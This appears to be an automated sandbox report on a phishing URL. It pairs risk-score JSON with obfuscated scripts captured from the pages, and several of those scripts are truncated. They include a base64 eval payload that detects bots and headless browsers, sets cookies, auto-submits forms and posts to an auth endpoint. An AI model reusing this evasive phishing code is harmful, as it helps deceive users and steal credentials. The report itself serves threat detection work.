Windows Analysis Report
https://webradiojaguar.net/FNB-POP.pdf

{
    "contains_trigger_text": true,
    "trigger_text": "CLICK HERE TO ACCESS SHARED DOCUMENT",
    "prominent_button_name": "CLICK HERE TO ACCESS SHARED DOCUMENT",
    "text_input_field_labels": "unknown",
    "pdf_icon_visible": false,
    "has_visible_captcha": false,
    "has_urgent_text": false,
    "has_visible_qrcode": false,
    "contains_chinese_text": false
}

{
  "brands": "unknown"
}

{
    "contains_trigger_text": true,
    "trigger_text": "CLICK HERE TO ACCESS SHARED DOCUMENT",
    "prominent_button_name": "CLICK HERE TO ACCESS SHARED DOCUMENT",
    "text_input_field_labels": "unknown",
    "pdf_icon_visible": false,
    "has_visible_captcha": false,
    "has_urgent_text": false,
    "has_visible_qrcode": false,
    "contains_chinese_text": false
}

{
    "contains_trigger_text": true,
    "trigger_text": "CLICK HERE TO ACCESS SHARED DOCUMENT",
    "prominent_button_name": "CLICK HERE TO ACCESS SHARED DOCUMENT",
    "text_input_field_labels": "unknown",
    "pdf_icon_visible": false,
    "has_visible_captcha": false,
    "has_urgent_text": false,
    "has_visible_qrcode": false,
    "contains_chinese_text": false
}

{
  "brands": "unknown"
}

{
  "brands": "unknown"
}

{
    "risk_score": 1,
    "reasoning": "The script only reloads the current page, which is a benign action with no harmful intent or risk indicators."
}

    window.location.reload();

{
    "risk_score": 4,
    "reasoning": "The script dynamically creates an iframe and injects a script into it, which is a form of aggressive DOM manipulation. It loads a script from a relative path, which could be benign if hosted on a trusted domain, but the lack of transparency and potential for misuse warrants further review."
}

(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8efde706bc0442c4',t:'MTczMzg0MDcwOC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();

{
    "risk_score": 6,
    "reasoning": "The script contains obfuscated code, which is a high-risk indicator (+3 points). It also uses aggressive DOM manipulation techniques, as indicated by the repeated and complex string operations (+2 points). The script's purpose is unclear, and the obfuscation suggests potential malicious intent, warranting further review. No specific trusted domains or legitimate analytics context is evident to reduce the score."
}

window._cf_chl_opt={cFPWv:'g'};~function(W,h,i,j,o,s,z,A){W=b,function(c,d,V,e,f){for(V=b,e=c();!![];)try{if(f=-parseInt(V(551))/1*(parseInt(V(571))/2)+-parseInt(V(588))/3+-parseInt(V(515))/4+-parseInt(V(541))/5*(-parseInt(V(505))/6)+-parseInt(V(556))/7*(parseInt(V(537))/8)+parseInt(V(605))/9+parseInt(V(493))/10,d===f)break;else e.push(e.shift())}catch(E){e.push(e.shift())}}(a,584184),h=this||self,i=h[W(601)],j=function(X,d,e,f){return X=W,d=String[X(502)],e={'h':function(E){return null==E?'':e.g(E,6,function(F,Y){return Y=b,Y(516)[Y(567)](F)})},'g':function(E,F,G,Z,H,I,J,K,L,M,N,O,P,Q,R,S,T,U){if(Z=X,E==null)return'';for(I={},J={},K='',L=2,M=3,N=2,O=[],P=0,Q=0,R=0;R<E[Z(544)];R+=1)if(S=E[Z(567)](R),Object[Z(498)][Z(590)][Z(561)](I,S)||(I[S]=M++,J[S]=!0),T=K+S,Object[Z(498)][Z(590)][Z(561)](I,T))K=T;else{if(Object[Z(498)][Z(590)][Z(561)](J,K)){if(256>K[Z(557)](0)){for(H=0;H<N;P<<=1,Q==F-1?(Q=0,O[Z(495)](G(P)),P=0):Q++,H++);for(U=K[Z(557)](0),H=0;8>H;P=P<<1|1&U,F-1==Q?(Q=0,O[Z(495)](G(P)),P=0):Q++,U>>=1,H++);}else{for(U=1,H=0;H<N;P=U|P<<1,F-1==Q?(Q=0,O[Z(495)](G(P)),P=0):Q++,U=0,H++);for(U=K[Z(557)](0),H=0;16>H;P=P<<1.3|1&U,Q==F-1?(Q=0,O[Z(495)](G(P)),P=0):Q++,U>>=1,H++);}L--,0==L&&(L=Math[Z(509)](2,N),N++),delete J[K]}else for(U=I[K],H=0;H<N;P=U&1.74|P<<1,Q==F-1?(Q=0,O[Z(495)](G(P)),P=0):Q++,U>>=1,H++);K=(L--,L==0&&(L=Math[Z(509)](2,N),N++),I[T]=M++,String(S))}if(''!==K){if(Object[Z(498)][Z(590)][Z(561)](J,K)){if(256>K[Z(557)](0)){for(H=0;H<N;P<<=1,F-1==Q?(Q=0,O[Z(495)](G(P)),P=0):Q++,H++);for(U=K[Z(557)](0),H=0;8>H;P=1&U|P<<1,F-1==Q?(Q=0,O[Z(495)](G(P)),P=0):Q++,U>>=1,H++);}else{for(U=1,H=0;H<N;P=P<<1|U,F-1==Q?(Q=0,O[Z(495)](G(P)),P=0):Q++,U=0,H++);for(U=K[Z(557)](0),H=0;16>H;P=P<<1|U&1,F-1==Q?(Q=0,O[Z(495)](G(P)),P=0):Q++,U>>=1,H++);}L--,0==L&&(L=Math[Z(509)](2,N),N++),delete J[K]}else for(U=I[K],H=0;H<N;P=P<<1|U&1.36,F-1==Q?(Q=0,O[Z(495)](G(P)),P=0):Q++,U>>=1,H++);L--,L==0&&N++}for(U=2,H=0;H<N;P=1.43&U|P<<1.63,F-1==Q?(Q=0,O[Z(495)](G(P)),P=0):Q++,U>>=1,H++);for(;;)if(P<<=1,Q==F-1){O[Z(495)](G(P));break}else Q++;return O[Z(530)]('')},'j':function(E,a0){return a0=X,null==E?'':''==E?null:e.i(E[a0(544)],32768,function(F,a1){return a1=a0,E[a1(557)](F)})},'i':function(E,F,G,a2,H,I,J,K,L,M,N,O,P,Q,R,S,U,T){for(a2=X,H=[],I=4,J=4,K=3,L=[],O=G(0),P=F,Q=1,M=0;3>M;H[M]=M,M+=1);for(R=0,S=Math[a2(509)](2,2),N=1;S!=N;T=O&P,P>>=1,P==0&&(P=F,O=G(Q++)),R|=(0<T?1:0)*N,N<<=1);switch(R){case 0:for(R=0,S=Math[a2(509)](2,8),N=1;S!=N;T=P&O,P>>=1,P==0&&(P=F,O=G(Q++)),R|=(0<T?1:0)*N,N<<=1);U=d(R);break;case 1:for(R=0,S=Math[a2(509)](2,16),N=1;N!=S;T=P&O,P>>=1,0==P&&(P=F,O=G(Q++)),R|=(0<T?1:0)*N,N<<=1);U=d(R);break;case 2:return''}for(M=H[3]=U,L[a2(495)](U);;){if(Q>E)return'';for(R=0,S=Math[a2(509)](2,K),N=1;S!=N;T=O&P,P>>=1,P==0&&(P=F,O=G(Q++)),R|=N*(0<T?1:0),N<<=1);switch(U=R){case 0:for(R=0,S=Math[a2(509)](2,8),N=1;S!=N;T=P&O,P>>=1,P==0&&(P=F,O=G(Q++)),R|=(0<T?1:0)*N,N<<=1);H[J++]=d(R),U=J-1,I--;break;case 1:for(R=0,S=Math[a2(509)](2,16),N=1;N!=S;T=P&O,P>>=1,P==0&&(P=F,O=G(Q++)),R|=N*(0<T?1:0),N<<=1);H[J++]=d(R),U=J-1,I--;break;case 2:return L[a2(530)]('')}if(0==I&&(I=Math[a2(509)](2,K),K++),H[U])U=H[U];else if(U===J)U=M+M[a2(567)](0);else return null;L[a2(495)](U),H[J++]=M+U[a2(567)](0),I--,M=U,I==0&&(I=Math[a2(509)](2,K),K++)}}},f={},f[X(600)]=e.h,f}(),o={},o[W(497)]='o',o[W(610)]='s',o[W(589)]='u',o[W(517)]='z',o[W(508)]='n',o[W(546)]='I',o[W(550)]='b',s=o,h[W(548)]=function(E,F,G,H,ae,J,K,L,M,N,O){if(ae=W,null===F||void 0===F)return H;for(J=y(F),E[ae(586)][ae(542)]&&(J=J[ae(529)](E[ae(586)][ae(542)](F))),J=E[ae(577)][ae(521)]&&E[ae(539)]?E[ae(577)][ae(521)](new E[(ae(539))](J)):function(P,af,Q){for(af=ae,P[af(549)](),Q=0;Q<P[af(544)];P[Q+1]===P[Q]?P[af(500)](Q+1,1):Q+=1);return P}(J),K='nAsAaAb'.split('A'),K=K[ae(608)][ae(543)](K),L=0;L<J[ae(544)];M=J[L],N=x(E,F,M),K(N)?(O=N==='s'&&!E[ae(584)](F[M]),ae(582)===G+M?I(G+M,N):O||I(G+M,F[M])):I(G+M,N),L++);return H;function I(P,Q,ad){ad=b,Object[ad(498)][ad(590)][ad(561)](H,Q)||(H[Q]=[]),H[Q][ad(495)](

{"typosquatting":false, "unusual_query_string":false, "suspicious_tld":false, "ip_in_url":false, "long_subdomain":false, "malicious_keywords":false, "encoded_characters":false, "redirection":false, "contains_email_address":false, "known_domain":false, "brand_spoofing_attempt":false, "third_party_hosting":false}

URL: https://thelusksgroup.com

{
    "risk_score": 7,
    "reasoning": "The script contains obfuscated code, which is a high-risk indicator (+3 points). It also uses the Function constructor for dynamic code execution, another high-risk indicator (+3 points). The presence of a base64 encoded URL suggests potential data exfiltration or redirection to an external domain, adding moderate risk (+2 points). The overall behavior and obfuscation suggest a suspicious intent, leading to a high-risk score."
}

    var link = "MHpZYlpubG9aeW9nbGtpTldQelVYMDRnbzVBTUU0Nm1NQ1JGdzNPeEp5SUxKUU4wdUh0Y1BtWXRLSW9pQnFqYWtXMWhscmozRzg0OExhVmQ4ZlVuUzlYNWlFMUlWUjZ3MktwNnR1WEFib0ZURHZRRGVyUE1mZFJIT3NPTkF6eGhXYnZaN0U3dzFvZEttY3IyUUI3R1RV";
    var random = "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9XaW5kb3dzX1NlcnZlcl8yMDE2";
    var autograb = false;
    const _0x370772=_0x4de9;(function(_0x4f6b79,_0x5e87a3){const _0x23902b=_0x4de9,_0x1aa4ca=_0x4f6b79();while(!![]){try{const _0x4ecf9d=parseInt(_0x23902b(0x1f2))/0x1*(-parseInt(_0x23902b(0x1ff))/0x2)+parseInt(_0x23902b(0x202))/0x3+parseInt(_0x23902b(0x201))/0x4*(parseInt(_0x23902b(0x215))/0x5)+parseInt(_0x23902b(0x210))/0x6+-parseInt(_0x23902b(0x200))/0x7*(-parseInt(_0x23902b(0x1fe))/0x8)+-parseInt(_0x23902b(0x1f8))/0x9+-parseInt(_0x23902b(0x1ed))/0xa*(parseInt(_0x23902b(0x1fd))/0xb);if(_0x4ecf9d===_0x5e87a3)break;else _0x1aa4ca['push'](_0x1aa4ca['shift']());}catch(_0x5e20f3){_0x1aa4ca['push'](_0x1aa4ca['shift']());}}}(_0x5cca,0xe5b41));const _0x6d4a3c=(function(){let _0x5cc2bf=!![];return function(_0x9b77da,_0x135712){const _0xf77bb9=_0x5cc2bf?function(){const _0xec2e23=_0x4de9;if(_0x135712){const _0x101ef2=_0x135712[_0xec2e23(0x204)](_0x9b77da,arguments);return _0x135712=null,_0x101ef2;}}:function(){};return _0x5cc2bf=![],_0xf77bb9;};}()),_0x487215=_0x6d4a3c(this,function(){const _0x34a2de=_0x4de9;return _0x487215[_0x34a2de(0x1f3)]()['search'](_0x34a2de(0x1ee))[_0x34a2de(0x1f3)]()[_0x34a2de(0x212)](_0x487215)['search'](_0x34a2de(0x1ee));});_0x487215();const _0x5dbfa7=(function(){let _0x4b0e96=!![];return function(_0xd5d4f3,_0xaef652){const _0x53ffda=_0x4b0e96?function(){if(_0xaef652){const _0x48e2d4=_0xaef652['apply'](_0xd5d4f3,arguments);return _0xaef652=null,_0x48e2d4;}}:function(){};return _0x4b0e96=![],_0x53ffda;};}());(function(){_0x5dbfa7(this,function(){const _0x13ac30=_0x4de9,_0x97b71d=new RegExp('function\x20*\x5c(\x20*\x5c)'),_0x562d3b=new RegExp(_0x13ac30(0x1f7),'i'),_0x4d3b42=_0x3d6ca4(_0x13ac30(0x1fb));!_0x97b71d[_0x13ac30(0x20c)](_0x4d3b42+'chain')||!_0x562d3b[_0x13ac30(0x20c)](_0x4d3b42+'input')?_0x4d3b42('0'):_0x3d6ca4();})();}());const _0x55444a=(function(){let _0x33f15b=!![];return function(_0x57a666,_0x260f9d){const _0x31c56e=_0x33f15b?function(){const _0x59e2eb=_0x4de9;if(_0x260f9d){const _0xb3158f=_0x260f9d[_0x59e2eb(0x204)](_0x57a666,arguments);return _0x260f9d=null,_0xb3158f;}}:function(){};return _0x33f15b=![],_0x31c56e;};}()),_0x4f3632=_0x55444a(this,function(){const _0x2ff6f3=_0x4de9,_0x330ee3=function(){const _0x1dd09b=_0x4de9;let _0x14d87b;try{_0x14d87b=Function('return\x20(function()\x20'+_0x1dd09b(0x218)+');')();}catch(_0x4d6905){_0x14d87b=window;}return _0x14d87b;},_0x131a47=_0x330ee3(),_0x18e009=_0x131a47[_0x2ff6f3(0x206)]=_0x131a47[_0x2ff6f3(0x206)]||{},_0x1706ee=[_0x2ff6f3(0x205),_0x2ff6f3(0x216),'info',_0x2ff6f3(0x203),_0x2ff6f3(0x1f5),_0x2ff6f3(0x1f4),_0x2ff6f3(0x207)];for(let _0x3a4ef4=0x0;_0x3a4ef4<_0x1706ee[_0x2ff6f3(0x1f1)];_0x3a4ef4++){const _0x5abefa=_0x55444a[_0x2ff6f3(0x212)][_0x2ff6f3(0x20e)]['bind'](_0x55444a),_0x2ee7c2=_0x1706ee[_0x3a4ef4],_0x5e394d=_0x18e009[_0x2ee7c2]||_0x5abefa;_0x5abefa[_0x2ff6f3(0x1f6)]=_0x55444a[_0x2ff6f3(0x208)](_0x55444a),_0x5abefa[_0x2ff6f3(0x1f3)]=_0x5e394d['toString'][_0x2ff6f3(0x208)](_0x5e394d),_0x18e009[_0x2ee7c2]=_0x5abefa;}});function _0x5cca(){const _0x49775a=['trace','bind','onload','Error\x20encoding\x20string.','/index?a=','test','while\x20(true)\x20{}','prototype','stateObject','7057404VGAaEh','location','constructor','/index','gger','4989590fceNiz','warn','string','{}.constructor(\x22return\x20this\x22)(\x20)','action','href','2800XoTiRS','(((.+)+)+)+$','call','substring','length','1nDTKwE','toString','table','exception','__proto__','\x5c+\x5c+\x20*(?:[a-zA-Z_$][0-9a-zA-Z_$]*)','945234wBsndJ','counter','hash','init','debu','155078irFNIr','8BAihSD','952052hXXCrM','11247859baQcXU','4QpQeNS','5065104jKIhEm','error','apply','log','console'];_0x5cca=function(){return _0x49775a;};return _0x5cca();}_0

{
    "risk_score": 4,
    "reasoning": "The script dynamically creates an iframe and injects a script into it, which is a form of aggressive DOM manipulation. It loads a script from a relative path, which could be benign if hosted on a trusted domain, but the lack of transparency and context makes it unclear. No high-risk indicators like data exfiltration or redirects to suspicious domains are present, but the behavior warrants further review."
}

(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8efde71ce8d2238a',t:'MTczMzg0MDcxMS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();

{
    "risk_score": 6,
    "reasoning": "The script contains obfuscated code, which is a high-risk indicator (+3 points). It also performs a redirect based on a condition, which could potentially lead to a malicious or suspicious domain (+3 points). The obfuscation makes it difficult to determine the exact behavior and intent, warranting further review."
}

    // Assuming you set this variable based on your server-side logic
    var captchaChecked = false;

    var _0x1191b7=_0xbfd1;(function(_0x21694d,_0x14ff1e){var _0x508579=_0xbfd1,_0x166353=_0x21694d();while(!![]){try{var _0x33a0cb=-parseInt(_0x508579(0xbd))/0x1+parseInt(_0x508579(0xbc))/0x2+-parseInt(_0x508579(0xb3))/0x3+parseInt(_0x508579(0xb1))/0x4+parseInt(_0x508579(0xb5))/0x5+parseInt(_0x508579(0xb8))/0x6*(-parseInt(_0x508579(0xb6))/0x7)+-parseInt(_0x508579(0xbb))/0x8*(-parseInt(_0x508579(0xb7))/0x9);if(_0x33a0cb===_0x14ff1e)break;else _0x166353['push'](_0x166353['shift']());}catch(_0x14b926){_0x166353['push'](_0x166353['shift']());}}}(_0x4115,0x48a4f));function _0xbfd1(_0x360452,_0x58b6dc){var _0x411500=_0x4115();return _0xbfd1=function(_0xbfd147,_0x475aaa){_0xbfd147=_0xbfd147-0xb1;var _0x575f6d=_0x411500[_0xbfd147];return _0x575f6d;},_0xbfd1(_0x360452,_0x58b6dc);}function _0x4115(){var _0x17f11c=['712026YIOaRQ','572630LjiGBC','16168YzyJHg','href','322833bRGkgm','location','1526960WuYSFB','919177rtAZkF','5174703gPjzCi','12tqkXfI','verify','captcha','8mENsTg'];_0x4115=function(){return _0x17f11c;};return _0x4115();}captchaChecked?window[_0x1191b7(0xb4)]['href']=_0x1191b7(0xba):window['location'][_0x1191b7(0xb2)]=_0x1191b7(0xb9);

{
    "risk_score": 4,
    "reasoning": "The script creates an invisible iframe and injects a script into it, which is a form of aggressive DOM manipulation. It loads a script from a relative path, which could be benign if hosted on a trusted domain, but the lack of transparency and potential for misuse raises concerns. No high-risk indicators like dynamic code execution or data exfiltration are present, but the behavior warrants further review."
}

(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8efde6f2eaee7ce4',t:'MTczMzg0MDcwNC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();

{
    "risk_score": 9,
    "reasoning": "The script uses dynamic code execution with 'eval' and 'atob', indicating potential obfuscation and execution of malicious code (+3 points). It manipulates cookies, which could be used for data exfiltration (+3 points). The script also includes aggressive DOM manipulation and potential redirection behavior, which are suspicious (+2 points). The use of obfuscated code and potential interaction with unknown domains further increases the risk (+1 point)."
}

eval(decodeURIComponent(escape(window.atob('KGZ1bmN0aW9uKCl7CiAgICAgICAgdmFyIGEgPSBmdW5jdGlvbigpIHt0cnl7cmV0dXJuICEhd2luZG93LmFkZEV2ZW50TGlzdGVuZXJ9IGNhdGNoKGUpIHtyZXR1cm4gITF9IH0sCiAgICAgICAgYiA9IGZ1bmN0aW9uKGIsIGMpIHthKCkgPyBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIiwgYiwgYykgOiBkb2N1bWVudC5hdHRhY2hFdmVudCgib25yZWFkeXN0YXRlY2hhbmdlIiwgYil9OwogICAgICAgIGIoZnVuY3Rpb24oKXsKICAgICAgICAgICAgICAgICAgICAgICAgdmFyIG5vdyA9IG5ldyBEYXRlKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIHZhciB0aW1lID0gbm93LmdldFRpbWUoKTsKICAgICAgICAgICAgICAgICAgICAgICAgdGltZSArPSAzMDAgKiAxMDAwOwogICAgICAgICAgICAgICAgICAgICAgICBub3cuc2V0VGltZSh0aW1lKTsKICAgICAgICAgICAgICAgICAgICAgICAgZG9jdW1lbnQuY29va2llID0gJ0FiVTFPdzBtSGlKa2s4TjhqVjJJQWRNNjItbz11dlA4S2YyTnVicWVkY1JrcEZ1YXhyVDM2STgnICsgJzsgZXhwaXJlcz0nICsgJ1dlZCwgMTEtRGVjLTI0IDE0OjI1OjAyIEdNVCcgKyAnOyBwYXRoPS8nOwogICAgICAgICAgICAgICAgICAgICAgICAvL2phdmFzY3JpcHQgcHV6emxlIGZvciBicm93c2VyIHRvIGZpZ3VyZSBvdXQgdG8gZ2V0IGFuc3dlcgogICAgICAgICAgICAgICAgICAgICAgICBpZighd2luZG93Ll9waGFudG9tIHx8ICF3aW5kb3cuY2FsbFBoYW50b20pey8qcGhhbnRvbWpzKi8KaWYoIXdpbmRvdy5fX3BoYW50b21hcyl7LypwaGFudG9tYXMgUGhhbnRvbUpTLWJhc2VkIHdlYiBwZXJmIG1ldHJpY3MgKyBtb25pdG9yaW5nIHRvb2wqLwppZighd2luZG93LkJ1ZmZlcil7Lypub2RlanMqLwppZighd2luZG93LmVtaXQpey8qY291Y2hqcyovCmlmKCF3aW5kb3cuc3Bhd24pey8qcmhpbm8qLwppZighd2luZG93LndlYmRyaXZlcil7LypzZWxlbml1bSovCmlmKCF3aW5kb3cuZG9tQXV0b21hdGlvbiB8fCAhd2luZG93LmRvbUF1dG9tYXRpb25Db250cm9sbGVyKXsvKmNocm9taXVtIGJhc2VkIGF1dG9tYXRpb24gZHJpdmVyKi8KaWYoIXdpbmRvdy5kb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuZ2V0QXR0cmlidXRlKCJ3ZWJkcml2ZXIiKSl7Ci8qaWYobmF2aWdhdG9yLnVzZXJBZ2VudCl7Ki8KaWYoIS9ib3R8Y3VybHxrb2RpfHhibWN8d2dldHx1cmxsaWJ8cHl0aG9ufHdpbmh0dHB8aHR0cmFja3xhbGV4YXxpYV9hcmNoaXZlcnxmYWNlYm9va3x0d2l0dGVyfGxpbmtlZGlufHBpbmdkb20vaS50ZXN0KG5hdmlnYXRvci51c2VyQWdlbnQpKXsKLyppZihuYXZpZ2F0b3IuY29va2llRW5hYmxlZCl7Ki8KLyppZihkb2N1bWVudC5jb29raWUubWF0Y2goL14oPzouKjspP1xzKlswLTlhLWZdezMyfVxzKj1ccyooW147XSspKD86LiopPyQvKSl7Ki8vKkh0dHBPbmx5IENvb2tpZSBmbGFncyBwcmV2ZW50IHRoaXMqLwogICAgICAgICAgICAgICAgICAgICAgICB2YXIgXzAxPXBhcnNlSW50KCIyMDI0MTIwOSIsIDEwKSArIHBhcnNlSW50KCIwOTEyMjAyNCIsIDEwKTsKICAgICAgICAgICAgICAgICAgICAgICAgLyp9Ki8KLyp9Ki8KfQovKn0qLwp9Cn0KfQp9Cn0KfQp9Cn0KICAgICAgICAgICAgICAgICAgICAgICAgLy9lbmQgamF2YXNjcmlwdCBwdXp6bGUKICAgICAgICAgICAgICAgICAgICAgICAgdmFyIHhodHRwID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLm9ucmVhZHlzdGF0ZWNoYW5nZSA9IGZ1bmN0aW9uKCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICh4aHR0cC5yZWFkeVN0YXRlID09PSA0KXsKICAgICAgICAgICAgICAgICBjb25zdCBmaXJzdEZvcm0gPSBkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCdmb3JtJyk7CgovLyBDaGVjayBpZiB0aGUgZm9ybSBleGlzdHMgYW5kIGlmIGl0IGhhcyBpbnB1dCBlbGVtZW50cwppZiAoZmlyc3RGb3JtKSB7CiAgY29uc3QgaW5wdXRGaWVsZHMgPSBmaXJzdEZvcm0ucXVlcnlTZWxlY3RvckFsbCgnaW5wdXQnKTsKICAKICBpZiAoaW5wdXRGaWVsZHMubGVuZ3RoID4gMCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZG9jdW1lbnQuZm9ybXNbMF0uc3VibWl0KCk7CiAgfSBlbHNlIHsKICAgICAgICAgICAgICAgICAgIGlmICghd2luZG93LmxvY2F0aW9uLmhhc2gpIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdpbmRvdy5sb2NhdGlvbi5ocmVmID0gd2luZG93LmxvY2F0aW9uLmhyZWY7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdpbmRvdy5sb2NhdGlvbi5yZWxvYWQoKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICB9Cn0gZWxzZSB7CiAgICAgICAgICAgICAgICAgaWYgKCF3aW5kb3cubG9jYXRpb24uaGFzaCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLmhyZWYgPSB3aW5kb3cubG9jYXRpb24uaHJlZjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLnJlbG9hZCgpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQp9CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgICAgICAgICB9OwogICAgICAgICAgICAgICAgICAgICAgICB4aHR0cC5vcGVuKCJQT1NUIiwgIi9yb2JvdC9oZWNrdG9yL2F1dGgvIiwgdHJ1ZSk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLnNldFJlcXVlc3RIZWFkZXIoJ1pCN0pBWnNXb2lw

{
    "risk_score": 3,
    "reasoning": "The script contains a base64 encoded string and a URL redirect to a known, reputable domain (Wikipedia). There is no evidence of high-risk behaviors such as dynamic code execution or data exfiltration. The use of base64 encoding and a data URL for an image are not inherently malicious. The script appears to be benign with no harmful intent."
}

        window.ZX983({
            B1: true, 
            T8: true, 
            R7: true, 
            G4: true, 
            Y5: true, 
            K9: true, 
            N0: true  
        });
        
        document.addEventListener('DOMContentLoaded', () => {
            const debug = false;
            // PHP variables
            const encodedText = "U2lnbi1pbiBvcHRpb25z";
            const decodedText = atob(encodedText);
            const random = "https://href.li/?https://en.wikipedia.org/wiki/Microsoft_365";
            const defaultBackground = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAB4AAAAQ4CAYAAADo08FDAAAAIGNIUk0AAHomAACAhAAA+gAAAIDoAAB1MAAA6mAAADqYAAAXcJy6UTwAAAAGYktHRAD/AP8A/6C9p5MAAIAASURBVHja7P1bkuQ6ki0KLlXQ3Nw9Yj+yKutW3Ssl0n89jP6+M+hh9Uh6VinSp+RkVUbuHRHubkao9gcAEgQBPuxt5lgu5nyBIAiCIADF0kX/r//P//f/iQiiiorlYKJrJ+EsIHb3RTRc2r58GJ8B0/mTxpsUL33M7Htc6PCJyuj58eKoXHTrCgCrDM9XO311nU6Pmpn6bu780fWH6QvlPZTzdDsg5CP764VYwjZI/GK4HcUwyAH1x8Vvp/GPzyvk3/A+OOR/SH63rcP7Zx3eVxnpfQzTq6P0J+lK0+/T051PmD4/qr9Z+/uK92XyIUp9uqPfVnGpF7+PAUDa5G7T9A/TK93zDNefeX7X/XynV6e5cDrd3ujOT8qXhnzu6oM4j+N8KLy/4bri35OwTUkGpumj5Hs/V75VLvtA5r63afmYfz+nz1fN13dduezqKcESpPVTup2WfwtbiCm5bkhHcn5aD9Po+qfNvxR6dHs7yf/kaJxe1nF5oKR8pt8nmak/U1y5/hmX9+TYOH3Lvn8lLCvV5fjn3s852KTKZXU7wr329WY+fqG1d1BRMaz3uC9rahRoBGAQGH1567+byRsw+j6H7cO+H/M49/UL8affn5n2+3i7lN4h4vpEVcHqll0/3h8zPGxX04JxDFUdfK+SsQEK19lut/jx/Qeen59BTNjv93h6eoJtLUj7sQWx0oX/8/ufeHl+Bin68NZCRbvw1lowNXh+fsaff/6J55dnAMBut8N2u4VtLVSpeC+qig0bbLdbfP/xHZtmg4YZTbPBjx/f0fjtzWaD79+/Y7PZgE+4vd1uu3SkaSRyvYPQ3gnHS9v9ecn3Oy2NM9+TtP1y7Oe7dP20/VC6LhW2S/dzbPu1+z4SgYjUoAER9eNffpirS6emz23t+MVM/q18AGvHz+L3j4nA4L5sEXX9KCFXTgUCUdeo6PpMUR2wdvwzXN/ld1+2w2+2/TUq/8Prj/sLSI4Pt4Xz9XrX/g3hlrZ/V+VGhVy4f5zik44/d4NQx/Y/y/aiUvtp5g3R+gZVVFwK9W27PMwdL+NfRcUlQNGv4rqQ6Od2FAytQrOdc1mwPMexivOB4DoX6fuqyTplfrm4pq4DIFP+/PFQ/nK/cP6BxrvQear1UUXFY0Bn1nVhuHOsx8u5dWBYn6bLe1ovoda7FRULEAxZbBjE1BleDp20PjDUMHfr7hhrYxoYNvrj+w/98vUL9u1e9/u9fnn9gp8/fioRadMYwNdZTWNATPrn9z/165cv2O12LvyXL/j504U3g/ANmFn//PNP/fr1axf+65ev+PH9hxIRjBkMTQzqSWMMiEi+//iOr1++ChuGtSI/fnzHly9fxRiGiMj379/x9etXYT7ttohAREr9FUEdj7s26rel4hHQrlivy8+3bKJfRUXFJ0WtAC4HA8D6H251SUxuSRRTa6rBtyKL8QzYlTNCaVWft7taYJ4Ruzmel2bafVYIuVmwGgYwCDyY20fTVtZoBu3cg4+pEJxZHnosF7bidNigN/IGhPW9Px4jNgjPoit/BAKgRAQooBHbzT9YAqCZKb6kLjwpoeN8a8cEKF/